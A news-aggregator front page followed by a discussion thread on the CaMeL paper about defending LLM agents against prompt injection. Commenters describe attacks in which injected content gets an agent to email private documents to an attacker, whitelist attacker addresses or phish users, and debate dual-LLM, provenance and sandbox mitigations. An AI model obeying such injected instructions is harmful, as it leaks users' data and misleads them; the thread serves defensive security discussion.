frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Hosting a website on a disposable vape

https://bogdanthegeek.github.io/blog/projects/vapeserver/
332•BogdanTheGeek•2h ago•311 comments

Addendum to GPT-5 system card: GPT-5-Codex

https://openai.com/index/gpt-5-system-card-addendum-gpt-5-codex/
78•wertyk•1h ago•48 comments

Wanted to spy on my dog, ended up spying on TP-Link

https://kennedn.com/blog/posts/tapo/
184•kennedn•4h ago•51 comments

PayPal to support Ethereum and Bitcoin

https://newsroom.paypal-corp.com/2025-09-15-PayPal-Ushers-in-a-New-Era-of-Peer-to-Peer-Payments,-...
265•DocFeind•6h ago•211 comments

Launch HN: Trigger.dev (YC W23) – Open-source platform to build reliable AI apps

104•eallam•5h ago•42 comments

Calif. construction worker unofficially broke a fabled world record

https://www.sfgate.com/sports/article/alo-slebir-mavericks-big-wave-surf-record-21041864.php
34•danielmorozoff•2d ago•25 comments

macOS Tahoe

https://www.apple.com/os/macos/
75•Wingy•3h ago•75 comments

React is winning by default and slowing innovation

https://www.lorenstew.art/blog/react-won-by-default/
53•dbushell•2h ago•71 comments

How big a solar battery do I need to store all my home's electricity?

https://shkspr.mobi/blog/2025/09/how-big-a-solar-battery-do-i-need-to-store-all-my-homes-electric...
188•FromTheArchives•8h ago•291 comments

GPT-5-Codex

https://openai.com/index/introducing-upgrades-to-codex/
93•meetpateltech•3h ago•23 comments

AOMedia Announces Year-End Launch of Next-Gen Video Codec AV2

https://aomedia.org/press%20releases/AOMedia-Announces-Year-End-Launch-of-Next-Generation-Video-C...
47•future10se•2h ago•32 comments

CubeSats are fascinating learning tools for space

https://www.jeffgeerling.com/blog/2025/cubesats-are-fascinating-learning-tools-space
140•warrenm•6h ago•59 comments

Boring work needs tension

https://iaziz786.com/blog/boring-work-needs-tension/
66•iaziz786•4h ago•40 comments

How to self-host a web font from Google Fonts

https://blog.velocifyer.com/Posts/3,0,0,2025-8-13,+how+to+self+host+a+font+from+google+fonts.html
86•Velocifyer•6h ago•80 comments

Turgot Map of Paris

https://en.wikipedia.org/wiki/Turgot_map_of_Paris
14•Michelangelo11•2d ago•1 comments

GuitarPie: Electric Guitar Fretboard Pie Menus

https://andreasfender.com/publications.php
7•DonHopkins•5h ago•1 comments

RustGPT: A pure-Rust transformer LLM built from scratch

https://github.com/tekaratzas/RustGPT
313•amazonhut•10h ago•155 comments

Asciinema CLI 3.0 rewritten in Rust, adds live streaming, upgrades file format

https://blog.asciinema.org/post/three-point-o/
232•ku1ik•4h ago•42 comments

Show HN: AI-powered web service combining FastAPI, Pydantic-AI, and MCP servers

https://github.com/Aherontas/Pycon_Greece_2025_Presentation_Agents
26•Aherontas•23h ago•3 comments

Removing newlines in FASTA file increases ZSTD compression ratio by 10x

https://log.bede.im/2025/09/12/zstandard-long-range-genomes.html
212•bede•3d ago•81 comments

The Mac App Flea Market

https://blog.jim-nielsen.com/2025/mac-app-flea-market/
278•ingve•13h ago•117 comments

Researchers revive the pinhole camera for next-gen infrared imaging

https://phys.org/news/2025-09-revive-pinhole-camera-gen-infrared.html
23•wglb•3d ago•1 comments

Self-Assembly Gets Automated in Reverse of 'Game of Life'

https://www.quantamagazine.org/self-assembly-gets-automated-in-reverse-of-game-of-life-20250910/
36•kjhughes•3d ago•4 comments

A string formatting library in 65 lines of C++

https://riki.house/fmt
34•PaulHoule•4h ago•12 comments

Folks, we have the best π

https://lcamtuf.substack.com/p/folks-we-have-the-best
291•fratellobigio•13h ago•80 comments

Show HN: Daffodil – Open-Source Ecommerce Framework to connect to any platform

https://github.com/graycoreio/daffodil
44•damienwebdev•6h ago•4 comments

Language models pack billions of concepts into 12k dimensions

https://nickyoder.com/johnson-lindenstrauss/
337•lawrenceyan•16h ago•119 comments

California reached the unthinkable: A union deal with tech giants

https://www.politico.com/news/2025/09/14/california-uber-lyft-union-00562680
24•markerz•1h ago•5 comments

Apple has a private CSS property to add Liquid Glass effects to web content

https://alastair.is/apple-has-a-private-css-property-to-add-liquid-glass-effects-to-web-content/
273•_alastair•5h ago•158 comments

Show HN: Datadef.io – Canvas for data lineage and metadata management

https://datadef.io/
3•theolouvart•1d ago•0 comments
Open in hackernews

CaMeL: Defeating Prompt Injections by Design

https://arxiv.org/abs/2503.18813
71•tomrod•4mo ago

Comments

simonw•4mo ago
I've been tracking prompt injection for 2.5 years now and this is the first proposed mitigation for it that feels genuinely credible to me. Unlike most of the others it doesn't rely on using other AI models to try and spot injection attacks, which is a flawed approach because if you only catch 99% of attacks your system will be broken by motivated adversarial attackers.

(Imagine if we protected against SQL injection or XSS using statistical methods that only caught 99% of attacks!)

I wrote up my own extensive thoughts on this paper last week: https://simonwillison.net/2025/Apr/11/camel/

Admittedly I have a bias towards it because it builds on a proposal I made a couple of years using dual quarantined and privileged LLMs: https://simonwillison.net/2023/Apr/25/dual-llm-pattern/

I'm particularly tickled that a DeepMind academic paper now exists with a section titled "Is Dual LLM of Willison enough?" (Spoiler: it is not.)

jaccola•4mo ago
I read your (excellent) blog post just now. This reminds me very much of the Apple "Do you want to share your location" feature.

Do you think that this practically limits the usefulness of an LLM "agent"?

In your email example it is all well and good for me to check it is indeed sending to bob@mycompany.com and confirm it as trusted from now on, but what if my agent is doing something with lots of code or a lengthy legal document etc.. Am I right in thinking I'd have to meticulously check these and confirm they are correct (as the end user)?

If that's the case, even in the email example many users probably wouldn't notice bob@mycumpany.com. Equally, this feels like it would be a non-starter for cron-like, webhook-like, or long-running flows (basically anywhere the human isn't already naturally in the loop).

P.S. They must have called it CaMeL for the two LLMs/humps, otherwise it is the most awful backronym I've ever seen!

gnat•4mo ago
My first thought was "oh, it's Perl's taint mode" which added another layer of meaning to the CaMeL name.
rurban•4mo ago
Unfortunately not. It just is a primitive intermediate layer of checks for each tool access. Which should be default for each such api call anyway.

It's by far not a proper capability based design as advertised.

simonw•4mo ago
> Do you think that this practically limits the usefulness of an LLM "agent"?

Yes, I do. I think it limits the usefulness a lot. Sadly it's the best option we've seen in 2.5 years for building AI "agents" that don't instantly leak your private data to anyone who asks them for it.

I'd love it if someone could come up with something better!

daeken•4mo ago
> (Imagine if we protected against SQL injection or XSS using statistical methods that only caught 99% of attacks!)

For what it's worth, we do that all the time: WAFs (web app firewalls). I can't begin to tell you the number of applications whose protections against XSS and SQLi were a combination of "hope we got it right" and "hope the WAF covered us where we didn't".

Once consulted on an M&A vetting gig, where they pulled me after a day because the sheer number of critical findings meant that there was no way that they would move forward. They used the WAF+prayers method.

simonw•4mo ago
Yeah, I have low opinions of WAFs!

They're actually a pretty good comparison to most of the other proposed mitigations to prompt injection: slap a bunch of leaky heuristics over the top of your system (likely implemented by a vendor who promises you the world), then cross your fingers and hope.

lostnground•4mo ago
After a cursory read, I see how this might prevent exfiltration, but not potential escalation.

It seems like it keeps you inside a box, but if the intention of my attack was to social engineer Bob by including instructions to whitelist attackers@location to hit with the next prompt, would this stop me?

simonw•4mo ago
I don't think it would. Social engineering attacks like that are practically impossible to prevent in any system where an LLM displays content to you that may have been influenced in some way by untrustworthy tokens.

They talk about that in the paper in section 3.1. Explicit non-goals of CaMeL

> CaMeL has limitations, some of which are explicitly outside of scope. CaMeL doesn't aim to defend against attacks that do not affect the control nor the data flow. In particular, we recognize that it cannot defend against text-to-text attacks which have no consequences on the data flow, e.g., an attack prompting the assistant to summarize an email to something different than the actual content of the email, as long as this doesn't cause the exfiltration of private data. This also includes prompt-injection induced phishing (e.g., "You received an email from Google saying you should click on this (malicious) link to not lose your account"). Nonetheless, CaMeL's data flow graph enables tracing the origin of the content shown to the user. This can be leveraged, in, e.g., the chat UI, to present the origin of the content to the user, who then can realize that the statement does not come from a Google-affiliated email address.

NitpickLawyer•4mo ago
> this might prevent exfiltration

Eh, I'd say it limits the exfil landscape, but it does not prevent it. As long as LLMs share command & data on the same channel at their core, leaking data is pretty much guaranteed given enough interactions.

So it would be useful as a defence in depth tool, but it does not guarantee security by itself.

thom•4mo ago
This works by locking down the edges of the system (e.g. tools) not to do stupid things, and maintaining provenance information end to end to inform that. That’s great if the attack is “send this sensitive document to baddie@evil.com” but it offers nothing when workflows devolve into pure text, where the attack could be to misinform or actively social engineer. I suppose you’d class this as necessary but not sufficient.
simonw•4mo ago
That's true, but it is at least addressed in the paper - see comment here https://news.ycombinator.com/item?id=43759505
petesergeant•4mo ago
So an initial LLM takes trusted input and a list of tools, and puts together an executable Python script using those tools. Some of those tools use LLMs for extraction purposes from downstream data, but the downstream LLMs don’t have access to tool usage, so even if the data to evaluate has malicious data, the worst thing they can return is a misleading string that’s not re-evaluated by an LLM, it’s simply set in a Python variable.

This feels like a lot of engineering for quite a narrow mitigation, and I guess I’m a little surprised to see a paper on it. Perhaps I need to start writing up some of my own techniques!

mentalgear•4mo ago
Definitely, I'd be interested even if you could just outline them!
petesergeant•4mo ago
Here is one I wrote today on LLMs that can handle chat input like humans write: multiple disjointed messages arriving asynchronously that need to be treated as one: https://sgnt.ai/p/interruptible-llm-responses/

I use a similar technique to the article for trying to avoid jailbreaks by putting untrusted input through zod to check I got back a JSON structure of the right shape, which has been very effective.

I’ve been sprinkling lexical in-memory search throughout prompts to save inference calls, which has been very effective

noodletheworld•4mo ago
I have to say I’m a bit skeptical.

The problem with a sandbox that executes arbitrary code (which is what this is; convert a request into code and execute it in a restricted runtime), is that if you expose APIs in that sandbox that can “do things”, then you have to be extraordinarily careful with your security policies to allow “good actions” and deny “bad actions”.

The side channel attacks are a good example; what if fetching an external url is the task you want an agent to perform?

How do “know” in your security policy what a good url is and what a bad one is?

What if the action is to apply a change to a database element? How does your security policy know how to only allow “good” updates?

Certainly you can hand craft guard rails (security policies), but at the end of the day you’re no closer or further than any other environment where you’re executing arbitrary code; it just takes different efforts to find the holes in those security policies and apis.

Ie. it’s easy to say “if you write a good sandbox and covert your LLM request into code and run it in the sandbox you’re fine”.

…but you’re as fine as your sandbox is; if your goal is a sandbox with holes in it for privileged actions; guess what, the arbitrary code you run in it can call those privileged actions.

Certainly the data provenance is a cool idea, but I foresee see a lot of “but but but…” when people try to enforce the boundaries in practice.